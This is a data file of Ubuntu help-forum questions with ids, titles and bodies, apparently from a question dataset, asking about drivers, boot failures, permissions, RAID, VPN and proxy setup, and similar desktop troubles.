342747	difficulties installing amd 8550g drivers	i downloaded the official .run file from amd 's website , but when i installed it when i boot my computer only the terminal was available throught cntrl + alt + t. the screen was black with the watermark `` hardware not supported '' so i unistalled fglrx drivers . when i booted up again my side bar was flickering and i have some other screen issues too . can someone help me on how to install the correct drivers ? my laptop is this and i run ubuntu 13.04 64bit . thank you
342748	do i download desktop iso file first or windows installer	i just downloaded ubuntu 13.04 desktop 64bit iso file , and ubuntu 4.2 windows 7 installer app . which do i install first . thanks looking forward to new ubuntu os . charles
342751	qt code for u touch returns `qmlscene : can not find qt installation of ''`	i 'm trying to start developing for ubuntu and ubuntu phone , but i get an error : qmlscene : can not find qt installation of '' when i attempt to run my application in ubuntu from the command line . i 'm very new to linux , so if you could fully explain what i need to do to fix it , then that 'd be great . i 'm running ubuntu 13.04 in a virtualbox virtual machine on an asus n56vz laptop . i installed the ubuntu sdk using the instructions on http : //developer.ubuntu.com , so i really have no idea what 's wrong .
342753	login screen loops on unity , how to get out ?	i understand that there are several questions discussing essentially the same thing in the past , and i have already looked through most of them . i have a ubuntu 13.04 installation that was working fine until i installed updates today . after the following reboot , i have not been able to log into my user account via the unity login screen . after entering my password the screen briefly flashes and then i am back at the login screen . i have been able to login into my user account via the shell ( by ctrl+alt+f1 ) or so . i can also log into a guest account via the login screen . i have already tried deleting the ~/.xauthority file . this did n't seem to help . finally , its worth noting that my ubuntu home directory is encrypted . i do n't know if this fact has anything to do with the failed login .
342765	ubuntu 13.04 64-bit - geforce gt 620 card is not working , always going to minimum graphics mode	i have geforce gt 620 card connected in a dell pc ( alienware x51 ) brand new . used livecd to install , while installing the graphics was correct . but after that i installed openbox and some more packages since then when i boot the grub screen shows but after that no graphics showing .
342766	can i install librecad to a thumb drive for portability between my machines ?	i use 4 different laptops with ubuntu . i would like it if i could keep the librecad program and drawing files on a thumb drive . can this be done ?
342767	how can i speed up minecraft after i bought more ram ?	i just put minecraft on my acer c7 which is running chrubuntu , and after i had bought an 8gb ram extension , minecraft is still running with only 5-9 fps . my system shows 9.4 gigs of ram running but still no difference in minecraft . i allocated more memory to minecraft but this still didnt make any changes to the lag . any help ?
342768	software raid0 does n't mount successfully in fstab	i have created a raid0 and it works as i expect it . the the array file is created at /dev/md0 . i want this to be mounted automatically by adding this line at the end of the /etc/fstab file : /dev/md0 /mnt/storage ext4 noatime , commit=60 , data=writeback , nodiratime , journal_async_commit , nouser_xattr 0 0 and this line at the end of the /etc/mdadm/mdadm.conf : array /dev/md0 metadata=1.2 name=lil-riko : lil-riko uuid=6016d5e4:6e42cb97:6b2a8e6e:098c1982 in boot time , i saw that /mnt/storage was being waited to be mounted and provide two options : to skip ... or to ma ... i forgot what its says . i waited so long that made think something is wrong . i went into the `` maintenance mode '' which is a root shell then i quickly checked presence of /dev/md0 file . the file was n't there , only /dev/md127 . i tried to mount that file instead and it complained about not finding a superblock . i manually mounted the raid via mdadm -- assemble /md0after removing the /dev/md127 file via mdadm -- stop /dev/md* and i continued booting . next reboot , i experienced the same issue . how come the raid was n't get automatically mounted ? there was no presence of /dev/md0 at boot time and i was able to mount it manually . edit1 : i have managed to `` merge '' it into one which is /dev/md127 by removing a disk , the problem still occurs but when i issue ths cat /proc/mdstat i got this : md127 : inactive sdc [ 1 ] ( s ) sdb [ 0 ] ( s ) 7830528 blocks super 1.2 this means ( i think ) the raid is not yet activated . but when i reattached it it comes active like this : md127 : active raid0 sdc1 [ 1 ] sdb1 [ 0 ] 7830528 blocks super 1.2 512k chunks what went wrong this time ?
342783	upgrading from 10.10 to 12.04	i 'm not versed in linux , but my father-in-law gave me ubuntu 10.10 on a usb , because my hardrive had failed and i put in a new one . i ran ubuntu from the usb for a while and decided that i would give it a try and installed it onto my brand new empty hardrive . i now see that i really need to upgrade to a newer version . i thought that i could use the update manager and just work my way up the version , but upgrading to 11.04 fails with the message `` failed to fetch , this may be a network problem '' . i can download 12.04 and 13.04 , but all i get are .iso files . what do i do with them ? running wubi.exe does n't work . i 've searched here and ca n't seem to find an answer which addresses my issue , or at least one written in a way i can understand . please bear with my inexperience with linux . update : so with further research i have found this : as a release gets old ( especially if it is not a lts release ) , it becomes no longer hosted at archive.ubuntu.com . however , the repository is still hosted at http : //old-releases.ubuntu.com so try changing your repository source to http : //old-releases.ubuntu.com . this is great , but i 'm now having difficulty finding somewhere that describes `` changing your repository '' for a layman . i have found these : help.ubuntu.com/community/repositories/ubuntu help.ubuntu.com/community/repositories/commandline but i ca n't seem to follow how to add the `` old releases '' url to the repository .
342788	web search shortcuts using keywords in gnome web	does gnome web browser support the keyword search functionality of firefox ? so , i define ggi as search google images and type ggi ubuntu in the address-bar to get the image search results ?
342790	can you 'mount ' an ubuntu touch ( nexus 4/7 ) device as a disk ?	is it possible to mount a nexus 4 or nexus 7 which is running the latest ubuntu touch dev preview as a disk via usb with mtp or similar ? i can adb and/or ssh into these devices , no problem , but i want to try to 'drag and drop ' videos and other documents from my macbook air ( running 10.8.4 ) or from my pc ( running either windows 7 or ubuntu ) . anyone know if it 's possible ? am i missing something blatant ? thanks !
342791	file permissions wo n't change	sorry fresh user . i installed about 9 days ago and had issues with unity disappearing which took 5 days of headaches to fix . it never did fix , i reinstalled . i set up plex ( media server ) and while the server is running and can be accessed by external network devices , i ca n't add files . plex says this is because of permissions . i have gone up and down the forums here and at plex to get an answer . it seems everyone says chmod -r 755 /media/my\ book/videos will change permissions to allow the folder `` videos '' on my external usb 2.0 ntfs 3tb western digital drive ( which is mounted and accessible through the file manager ) as well as every sub-directory and file contained therein to be accessible to user `` plex '' . i have used file manager and as soon as you click to change permissions it changes right back . when i chmod with -c it tells me every file is changed ( usually 600 ) to 755 as i commanded it to do . i did ls -l to verify and there is no change . ( i also used ls -l to make sure i knew who the owner was and it is me ( mvl1014 ) . ls -al gives me the same info . ) i swear to god i tried to sudo it and after smashing my head against this keyboard for basically the entirety of my day , i tried it as root . i was scared shi-less but could n't come up with anything else . sudo su to root and then chmod -r -c /media/my\ book/videos same result . -c told me every single file was changed and a check in unity or in terminal confirmed not a darn thing changed . now it seems to me that even if that is n't the thing stopping plex from working there is still a problem with this command not going through . 12.04lts -- on gen 1 i7 ( 2.7 ghz i believe ) with 6 gb ram i 've attempted to attach a screenshot but i 'm told i need 10 reps to do so , which means i 'm copy/pasting too . please excuse my obfuscation , but lorem ipsum seemed unnecessary . and i tried multiple ways to format this but it looks perfect every way and messed up each time in the preview below . ( ugh , i 'm a mess . ) $ chmod -r -c 755 /media/my\ book/videos ... .. ... .. ... .. mode of `/media/my book/videos/xxxx/xxxx/xxxx.mkv ' changed from 0600 ( rw -- -- -- - ) to 0755 ( rwxr-xr-x ) ls -al shows : mvl1014 @ fx6800 : /media/my book/videos $ ls -al total 88 drwx -- -- -- 1 mvl1014 mvl1014 0 aug 28 15:17 . drwx -- -- -- 1 mvl1014 mvl1014 20480 sep 3 14:29 .. drwx -- -- -- 1 mvl1014 mvl1014 8192 aug 28 15:18 xxxx drwx -- -- -- 1 mvl1014 mvl1014 49152 aug 16 14:02 xxxx drwx -- -- -- 1 mvl1014 mvl1014 8192 aug 27 21:36 xxxx drwx -- -- -- 1 mvl1014 mvl1014 4096 jul 23 19:09 xxxx i apologize if this has been asked . i looked through this place plus at all the suggested `` similar questions '' . the closet thing i got to an answer was here , but running the provided code with my own uid did n't work either .
342800	directory access priveilege question	let 's say i get this as a result of ls -l : -rwxrwxrwx 1 user user 0 nov 19 20:13 file4 what does the 1 mean ? im asking because i had 2 folders set up on my server working just fine , and they had the number 4 there , then i made a new folder , but it got the number 3 and does n't work quite properly . how do i change this ? thanks .
342802	installing ubuntu on a secureboot machine with no existing os	i was given some bad ( malicious ) advice , and my entire os was deleted . i had ubuntu before , fully replacing the windows 8 that came with my acer aspire 1 laptop . i tried reinstalling ubuntu from a flash drive , but the hdd security would n't let me boot after the restart at the end of installation . in grub , pretty much every command tells me secure boot wo n't allow it . is there anything i can do ? ubuntu preview loads just fine , and i 'm trying to install from there , but i figure secure boot will block me again after restart .
342804	linux 101 verses microsoft windows	i 've been following linux since the late 1990s . here is my question : first , why can not microsoft window applications and programs software companies start making their proprietary arts and crafts compatible with linux ? this is not be a rhetorical question , but of frustration for how we , the people , do not want to petition big business for another option/choice such as open source linux . thank you , and for the record , i am an inventor and an investor too . finally , how may i help expedite this necessarily and sufficiently ?
342806	ca n't paste items into directory if it is made by another user	i ca n't add documents to directories made by other users of my samba file server . say i 'm user1 , and there is another person user2 . if user2 makes a folder , and i ( user1 ) try to add something to it , it says you do n't have permission , but user2 can drop all the stuff he wants into it . what am i doing wrong ?
342807	xampp opt/lmapp/lampp start script is doing nothing	i installed xampp for ubuntu 12.04 . i was able to reach the xampp splash page/index page . then , when i clicked on myphpadmin , it was n't working and i would get an error page . so instead i tried restarting my computer . after restart i assumed apache had to be restarted . so , i went to opt/lampp and typed lampp start . nothing happens and i just get the directory and cursor again in my terminal . below is the snippet . root @ ubuntu : /opt/lampp # lampp start lampp : command not found root @ ubuntu : /opt/lampp # anyone have any clues ? thank you !
342810	unable to run executable link	i added a link to the desktop using nautilus ( `` make link '' ) : me @ 1234 : ~/desktop $ ls -al total 8 drwxr-xr-x 2 alex alex 4096 sep 8 12:15 . drwxr-xr-x 42 alex alex 4096 sep 8 00:22 .. lrwxrwxrwx 1 alex alex 41 sep 8 12:14 android studio - > /opt/android/android-studio/bin/studio.sh but when i run it , it just open this file in gedit . what do i do about that ? and ls -al /opt/android/android-studio/bin/studio.sh -rwxr-xr-x 1 alex alex 6505 jul 11 23:48 /opt/android/android-studio/bin/studio.sh
342814	no internet access issue	using ubuntu 13.04 as virtualbox guest on windows 8 host . my etc/network/interfaces looks like that : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.38 netmask 255.255.255.0 gateway 192.168.1.1 broadcast 192.168.1.255 auto eth1 iface eth1 inet static address 192.168.56.102 netmask 255.255.255.0 gateway 192.168.56.1 broadcast 192.168.56.255 here is adapter 1 's config and adapter 2 's config ifconfig returns : internet comes from 192.168.1.38 - bridged adapter ( i think it 's eth0 ) . it 's connected directly to wireless router . but ubuntu does n't get internet from this adapter . i can connect from host to guest using putty with ip 192.168.56.102 but when i try to connect to the internet from inside guest os - ubuntu , here is what i see : what am i doing wrong ?
342820	trying to update but not enough space on boot ( answer here )	the error message i get suggests `` sudo apt-get clean '' i try running it but nothing happens . just get back to the prompt . is there any other terminal commands i should try to clean temporary files out of my boot partition ?
342827	external microphone stopped working after kernel upgrade ( internal and webcam microphones still working )	i was on an old ubuntu 10.04 gnu/linux based system which used 2.6.x kernels and i had no problems with the microphone . now i have done a fresh upgrade to a system based on ubuntu 12.04 gnu/linux with kernel 3.2.0-52-generic-pae and my external microphone stopped working . this is my headset 's microphone which has its own connector separate from that of the headphone part of the headset . when i connect the microphone 's connector to the jack on the front of the laptop ( an acer aspire 5680 series ) and check the input level on the input tab of the sound settings , nothing changes there meaning that no input from the microphone is detected . my internal ( laptop ) microphone and the microphone in an external ( usb ) web cam i have work properly , but their quality is very low so i need to use my external microphone which used to work properly . here are the things i have tried , without success . added options snd-hda-intel model=auto to /etc/modprobe.d/alsa-base.conf . also tried model=acer and model=acer-aspire . chose all possible combinations of mic , front mic , and line in in capture ( f4 ) part of alsamixer . downgraded to older kernels , as far back as 3.2.0-38-generic-pae there is a similar question here external microphone does n't work on a macbook pro 8,2 even though recording via internal microphone works fine , which is unanswered at the time i am writing this . any ideas what may be causing this and what else i may try ?
342828	not able to install *.run file in ubuntu ?	i am newbie with ubuntu and i am using ubuntu 12.04.3 lts version inside windows using wubi . i have to install few softwares in ubuntu which are as follow : mplab x ide version 1.90 xc8 compiler and x32 compiler cadsoft from eagle i download there setup files , which are having extension *.run extension . i searched on internet and found that these files do n't have executable permission , either one have to do it graphically by right clicking on the file and then under permissions tab check the allow executing as program check box , or use chmod command to do so . i had tried everything but nothing works for me . i used graphical method to change this , but as soon as i click on the check box , the check mark disappears . i tried command line methods too but nothing works for me : sudo chmod u+x mplabx-v1.90-linux-installer.run sudo chmod +x mplabx-v1.90-linux-installer.run chmod +x mplabx-v1.90-linux-installer.run sudo chmod 777 mplabx-v1.90-linux-installer.run when run : sudo ./mplabx-v1.90-linux-installer.run the result is command not found . sudo `` ./mplabx-v1.90-linux-installer.run '' results in command not found . i tried all these commands but nothing changes the permission to executable . please help me as soon as possible .
342832	how to set a proxy in kde ?	i 'm using kde and tor . i 'm could not set tor ip into the network manager . network manager has not any option for proxy .
342835	overwrite a file ?	i have a file named config.yml in a directory i need to be able to edit it and then overwrite it . when ever i would edit it and save it with the same name it would ask to overwrite and i would say yes but it had overwritten a config.yml in another place not the one i had wanted . i need help because i need to overwrite the right config file . thanks
342838	teamviewer not correctly installed	i installed ( partially ) teamviewer but the installation did not complete because dependency errors . teamviewer depends on ia32-libs which depends on ia32-libs-i386 . the dependency tree can get quite long . i tried running sudo apt-get install -f to no avail . please if anyone has tips on installation help me . as suggested the output of sudo apt-get install -f is more problems to get a complete view of this problem . i tried this dpkg -- add-architecture i386 but dpkg says dpkg : error : unknown option -- add-architecture so might the problem be with dpkg ?
342842	what does this command mean : awk -f : ' { print $ 4 } ' ?	please explain what does following command mean : awk -f : ' { print $ 4 } '
342843	package dependencies can not be resolved	i 'm running ubuntu 12.04.3 32-bit . when i try to download something like wine or chromium out of ubuntu software center it wo n't let me and says this to me : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . what does this mean ? i 'm not even installing anything right now . how can i fix this so i can download the programs ?
342845	can i use mouse click to focus on byobu splits ?	i know byobu is a terminal multiplexer and mouse is not a priority , but i still would like to know if there is a way to focus on a split using mouse click instead of keyboard shortcuts . in negative case , it certainly would be a great feature .
342847	grub-install failed ; fatal error	i 'm having trouble dual-booting 12.04 alongside windows 8 . it 's a self-assembled pc , so there 's no oem uefi or anything like that ( just to be safe , i checked the bios settings and it was set to legacy ) . so the problem is i boot from the live dvd , allow ubuntu to carve out its own partitions ( by selecting `` install alongside windows 8 '' ) , it proceeds to a screen where it tells me installation was successful , then a message pops up saying `` executing 'grub-install /dev/sda ' failed . this is a fatal error . '' so i chose to finish the installation without a bootloader . before i go further , here is the return for fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdb : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x89e1bf3c device boot start end blocks id system /dev/sdb1 * 2048 86843397 43420675 7 hpfs/ntfs/exfat /dev/sdb2 86845438 117229567 15192065 5 extended /dev/sdb5 86845440 100560895 6857728 83 linux /dev/sdb6 100562944 117229567 8333312 82 linux swap / solaris i have it set up so that /dev/sda is my storage hdd with files accessible by both ubuntu and w8 . /dev/sdb is my ssd that i want to run both oss on . /sdb1 is my existing windows installation , sdb5 is the currently unbootable 12.04 installation , and sdb6 is swap . what i have tried so far is deleting the partitions and redoing the whole thing , except initiating it by running ubiquity -- desktop % k gtk_ui in sudo . no change in behavior . i have tried running grub-install in sudo and it completes successfully . however , when rebooting it boots what i would assume to be the grub terminal . obviously the gui form is preferable . anyway , i 'm a linux noob , so i 'm open to suggestions .
342854	what is the command line statement for changing the system clock ?	is there such command for changing the system clock ' date and time ? for example : the current date and time is january 1 , 1970 23:30:59:980 where 59 and 980 refers to the seconds and millisecods respectively and i want to change it to january 2 , 1971 24:31:59:990 is there a command for this ?
342857	how to make entire-disk filesystem with gparted ?	with gnome-disk-utility alias palimpsest there is an option to format entire disk with partitioning scheme `` none '' or something similar . how do i do that in gparted ? ( ? is it the `` loop '' option ? ) or does it not have that feature ?
342863	can not install adobe flash player	i ca n't install adobe flash player . i tried terminal , ubuntu software centre , and synaptic package manager , but i got error message : flashplugin-installer : depends : libnss3-1d but it is not going to be installed depends : libnspr4-0d but it is not going to be installed i tried apt-get update , but it 's not working . i also tried installing libnss3-1d and libnspr4-0d but i got an error message . i also tried using ubuntu-restricted-extras , but i can not get flash installed .
342864	how to get recent tzdata onto old ubuntu versions	i have a bunch of servers running 10.04 with the timezone set to asia/jerusalem that have all wrongly switched out of dst last night . my workstation running 13.04 , however , has the correct time ( for now ) . looking at the package details , it looks like only recent ubuntu versions get timezone updates , so my questions are : really ? timezone database updates do not get backported to supported ubuntu versions ? it seems like a weird decision , so maybe i 'm missing something . what would be the recommended way to make sure older servers get tzdata updates ? it seems that even the latest tzdata package ( 2013d ) still contains stale information , and would change out of dst a few weeks to early . http : //www.ietf.org/timezones/data/asia seems to contain the latest update ( 2013-06-27 ) , but i 'm not sure how to turn that into a zoneinfo database . how should i approach fixing this ? update : somebody opened a bug .
342867	boot problems after upgrading from 12.04 to 12.10	i am not an experienced ubuntu user . i updated my existing 12.04 until no more updates were available and then i chose to upgrade my system to version 12.10 . all went well ( or at least i thought it did ) until i was prompted to `` restart '' the system . once i restarted the system i could hear my hdd doing its thing and then saw the screen come on and it said something about either waiting for something to happen ( which i chose to do ) or press `` s '' to skip mounting or something like that ( i could n't read it fast enough ) . anyhow , the computer locked up and it would n't boot into ubuntu . i powered the system down and restarted it hoping to see the message again , but it did n't return . it just locked up during the boot process and i have n't seen my login screen again . i have a dual boot configuration with windows vista home premium ( 32-bit ) and i have never had a problem upgrading in the past . my processor is an amd 64-bit and i have always used the 64-bit version of ubuntu with no problems . i would appreciate your help in this matter . sincerely , dennis
342873	is it possible to use an ipod classic3g as external disk with ubuntu 12.04 ?	i have an ipod classic 30gb . it is partitioned with apple hfs . can i use it as an external drive with ubuntu 12.04 lts ? to sudo fdisk -l i get : disk /dev/sda : 8006 mb , 8006926336 bytes 247 heads , 62 sectors/track , 1021 cylinders , total 15638528 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00085342 device boot start end blocks id system /dev/sda1 * 2048 13559807 6778880 83 linux /dev/sda2 13561854 15636479 1037313 5 extended /dev/sda5 13561856 15636479 1037312 82 linux swap / solaris disk /dev/mmcblk0 : 16.3 gb , 16288579584 bytes 255 heads , 63 sectors/track , 1980 cylinders , total 31813632 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000881d5 device boot start end blocks id system /dev/mmcblk0p1 * 2048 31813631 15905792 83 linux note : sector size is 2048 ( not 512 ) disk /dev/sdb : 30.0 gb , 30005821440 bytes 64 heads , 32 sectors/track , 7153 cylinders , total 14651280 sectors units = sectors of 1 * 2048 = 2048 bytes sector size ( logical/physical ) : 2048 bytes / 2048 bytes i/o size ( minimum/optimal ) : 2048 bytes / 2048 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table to sudo blkid i get : /dev/sda1 : uuid= '' 10b8c1cb-1b08-4b58-a312-376ea4206fb6 '' type= '' ext4 '' /dev/sda5 : uuid= '' 969c9b05-a91e-43ed-8fd1-715fdbbf2f71 '' type= '' swap '' /dev/mmcblk0p1 : label= '' xinutop-nav '' uuid= '' 2c574e17-6f0e-4828-b153-ded6a7a03d2f '' type= '' ext4 '' /dev/sdb3 : uuid= '' 693884dd-2694-3072-b912-ed8d6c27728e '' label= '' pamelam-bm-^ @ m-^ys ipod '' type= '' hfsplus '' to mount -l i get : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/thierry/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=thierry ) /dev/mmcblk0p1 on /media/xinutop-nav type ext4 ( rw , nosuid , nodev , uhelper=udisks ) [ xinutop-nav ] /dev/sdb3 on /media/pamela’s ipod type hfsplus ( ro , nosuid , nodev , uhelper=udisks ) [ pamela’s ipod ]
342877	enable wireless monitor mode for traffic sniffing	i need to sniff all the wifi traffic that i can capture using wireshark in ubuntu . my wireless interface is named as eth1 in the interfaces list . when i select that interface in wireshark and start new sniff , i got following error ; as this thread says , i tried to installed the mentioned driver but i got an error in installation saying that that driver is not supported by my device . after that i tried the second answer in the same thread and run following command to enable monitor mode in my wireless card . echo 1 > /proc/brcm_monitor0 then i saw a new ethernet interface ( not a wireless interface ) called prism0 in wireshark interface list . i could n't start a sniff using that interface using monitor mode because in that interface settings , monitor mode check box has been disabled . i have installed a broadcom wireless driver in additional drivers as follows : is there an error listing my wifi interface as eth1 rather than wlan0 in the interfaces list ? how can i start my wireless interface in monitor mode for sniffing ? thank you .
342880	mongodb does not shutdown cleanly on system shutdown	when i shutdown ubuntu running mongodb ( installed via apt ) , occasionally mongodb does n't appear to finish shutting down completely - the log file matches a healthy shutdown , closing files , cleaning up the journal etc.. but the filnal [ interruptthread ] shutdown : removing fs lock ... is n't present , and ( unsurprisingly ) mongodb refuses to start at the next bootup , complaining of a stale lock file . it appears to me that there is a timeout for services to quit by themselves that is expiring , and thus mongodb is killed forcibly . the offending mongodb is part of a replica set that sync 's over ssh tunnels . it may thus be possible that a socket is hanging and holding up the final cleanup ( including removing the lock file ) ? ? what can i do about this ? can i set a longer timeout for mongodb to shutdown ? can i insist that mongodb be allowed to die cleanly before ssh tunnels are killed ? is there another explanation that i 'm missing ? ?
342881	vpn connection successfully established , but ip address does not change	i have set up an openvpn connection via the network manager on ubuntu 12.04 following these instructions : https : //www.privateinternetaccess.com/pages/client-support/ # ubuntu_openvpn_installer initially i could not access any websites when connecting to the vpn network . i then ticked the box for 'use this connection only for resources on its network ' under ipv4 settings , routes . after ticking the box everything seemed to work . i could connect to the vpn network and open websites . i only coincidentally noticed though , that although the network manager tells me that i have successfully connected to the vpn network , my ip address does not change . i then looked into the private internet access configuration files downloaded from the link above and found the port number 1194 , which i opened using the firewall configuration tool firewall . i also unticked the box 'use this connection only for resources on its network ' and connected to the vpn network . i can do google searches and access one or two random websites , but then i get a 'connection failed ' from the browser . it seems to connect to the vpn network successfully though . the ip address changes according to the host i am using . i would be really great full for some tips . i tried to fix this problem for some time but have not been successful in my attempt . thanks : - )
342885	google chrome wo n't start	i am running ubuntu 12.04 . the chrome browser wo n't start . sometimes i can get it to start when trying to start it for a couple of times . this is what i get when i start it via the terminal : [ warning : flash/platform/pepper/pep_module.cpp ( 63 ) ] sandboxed any help would be appreciated . cheers
342886	select commands from bash history	pressing the up button is tedious and i might miss the command i was looking for . so when typing history at the terminal gives me all the commands i have entered before , indexed to a number . is there any way i could just call the number associated with the command ?
342891	ubuntu files are not accessible through windows 8	i have installed ubuntu 13.04 64-bit alongside genuine windows 8 . i can access both through grub boot menu ( though the windows 8 is shown as 'windows 8 uefi recovery ' ) , but the problem is , when i save something in ubuntu on a drive , i ca n't find the file after booting in to windows 8 . the problem is worst when i try to access the f drive from windows 8 it shows `` f : \ is not accessible . the file or directory is corrupted and unreadable '' . this drive is not the drive where ubuntu was installed . what should i do now ?
342898	how can i fix ubuntu winboot wubildr.mbr missing error ?	i have installed ubuntu 12.04 ( 64 bit ) operating system . it supports uefi so i installed it like a normal dual booting now ( not like wubi ) . when i try to load windows 8 it works fine . but when i try to run ubuntu , i get the following error : ubuntu winboot wubildr.mbr missing how to fix the ubuntu boot-loading issue ? update : i have tried bootinfoscript on my lap and this is the url : http : //paste.ubuntu.com/6073509/
342900	compressing folders with password via command line	i would like to know whether it is possible to do the following via cli . i have a folder f which contains several sub folders and some files . i want to compress folder f into .zip file with the `` password-only-extract '' .
342901	chromium is having difficulties in showing some web pages	i 'm experiencing some problems using chromium on ubuntu : while firefox works perfectly , chromium will ... behave strangely , not being able to use the features provided by some websites like facebook , google+ or even google support . description ( example ) for example , on facebook when i click on a picture , it will show up in a box where you can comment , like , identify people and so on . up to this , everything works perfectly , but if i try to click on something the page does n't respond anymore , freezing on that picture . the title written in the tab and the url both say that i 'm not on the picture anymore but the page wo n't change . when i change to another tab and then come back to the one i 'm experiencing problems , the whole page displays a black screen but the cursor becomes this cute little hand , detecting the links . there is another strange thing : when experiencing this problem the only way to get out of the page is to close the tab or to move to another tab within chromium . when i tried to switch to another software while being on the guilty page in chromium , the page stays on foreground , hiding the other software . what i tried i looked for answered questions like mine before posting like here , there or others i do n't remember but nothing worked . i tried to uninstall chromium , then uninstall virtualbox guest additions , then reinstall both but it was n't better . adding resources to the vm neither did n't do anything . technical context i use a laptop with windows 7 emulating ubuntu 13.04 via virtualbox ( the vm has more resources than it needs ) . windows , ubuntu , chromium and virtualbox are all up to date : chromium : version 28.0.1500.71 ubuntu : 13.04 ( all packages up to date ) windows 7 : nothing showed in windows update virtualbox & guest additions : version 4.2.18 r88780 the laptop is a sony vaio sve1711x1e/b ( here on a french website ) here 's the result of sudo lshw -c video : *-display non-réclamé description : vga compatible controller produit : virtualbox graphics adapter fabriquant : innotek systemberatung gmbh identifiant matériel : 2 information bus : pci @ 0000:00:02.0 version : 00 bits : 32 bits horloge : 33mhz fonctionnalités : vga_controller bus_master configuration : latency=0 ressources : mémoire : e0000000-e7ffffff thanks a lot for reading this post , any help will be greatly appreciated : )
342905	how can i fix ubuntu screen goes blank ?	we have installed ubuntu 12.04 lts on an asus f83se . during installation we pressed f6 to use nomodeset and also set acpi to off . now that ubuntu 12.04 has installed , the screen goes blank . how can we overcome this problem ? the system 's specifications : intel ( r ) core 2 duo cpu t6600 @ 2.2o ghz ati mobility radeon hd 4570 4gb ram
342906	change proxy settings in ubuntu	i want to use the ubuntu software center to install software , but i can not download them . how can i give my proxy settings in ubuntu terminal ( just like we use cmd in windows to choose ie proxy settings ) ?
342908	fedora missing in grub inside ubuntu	i have ubuntu and fedora beside each other and i use both of them but now fedora missing and ubuntu run . what should i do ? it 's very important for me
342913	32bit libs on a 64bit system	i 'm running ubuntu 12.04 lts in a 64-bit version . after hours and hours of reading and going through many forums , i 'm still confused about running 32-bit applications . i figured out that my ubuntu is multi architecture enabled : dpkg -- print-foreign-architectures gives me an i386 . however , if i want to run some 32 bit applications now , which package of 32-libs do i really need ? ia32-libs-multiarch or ia32-libs ? can somebody please explain me the difference ? ( on some forums i even read about ia32-libs-i386 ? ) thank you very much for clarification .
342917	convert a live cd to a bootable usb	i bought an ubuntu cd that contains an iso image file ( .iso ) . i want to install ubuntu on a netbook and it can not be done by the cd , so i have to install ubuntu by usb . how can i convert the ubuntu cd to a bootable usb ?
342919	samba share as download location for firefox ( 12.04 )	i want to download something using firefox to a network share on a synology nas ( with password security ) . in the file browser i can acces the share ( but i can not write to it because it is mounted read only ? ) . but the download to window in firefox does not list network shares ... so i tried to mount the share to /mnt/nas using smbmount and mount.cifs . sudo smbmount //192.168.2.20/software /mnt/nas -o user=the_user file_mode=0777 , dir_mode=0777 , dmask=777 , fmask=777 , umask=022 rw 0 0 this works and i can create folders . but when i point firefox to it ca n't write to it..how should i mount the share as a download location for firefox ?
342920	what the things i have to do after installation	i am new to ubuntu i installed ubuntu 12.04 so can u give me things to done first after installing ubuntu for the first time software to speed up the system terminal tips and basic uses
342921	how to disable the discrete gpu ? i get 'kernel failure ' with the normal method	i have notebook hp dm3-2015er with two graphic cards . $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] park [ mobility radeon hd 5430 ] both powered . $ sudo cat /sys/kernel/debug/vgaswitcheroo/switch 0 : igd : + : pwr:0000:01:05.0 1 : dis : : pwr:0000:02:00.0 but executing of echo off > /sys/kernel/debug/vgaswithceroo/switch leads to kernel failure or something . i have to shut down by holding power button . i 'm new to linux so i do n't know where to find messages shown before freezing . please help .
342922	power button shuts down computer without asking for confirmation ?	i upgraded to kubuntu 13.04 on a dell vostro 1510 . when i press my power button on the laptop , kubuntu does not ask me a confirmation but shuts down the latptop directly . how can i make it prompt me with a confirmation ?
342924	login is incorrect in safe mode	after updating packages i have a problem . system does n't load normally , it has some graphical errors . only black screen where i am asked to type my login and password . after typing , i receive message that login is incorrect i had tried with small first letter , big - there are no difference tried root and my password which i used always in sudo -i and there is no difference . ubuntu 12.04.3 lts pcname tty1 pcname login :
342925	opening an .accdb file in ubuntu ?	i 've received a microsoft access .accdb file ( version 2010 i believe ) that i need to get some data from . how can i open it in ubuntu ? is there any tool that would allow me to do so ? ps : read-only is fine , if it has csv exporting capabilities , the better .
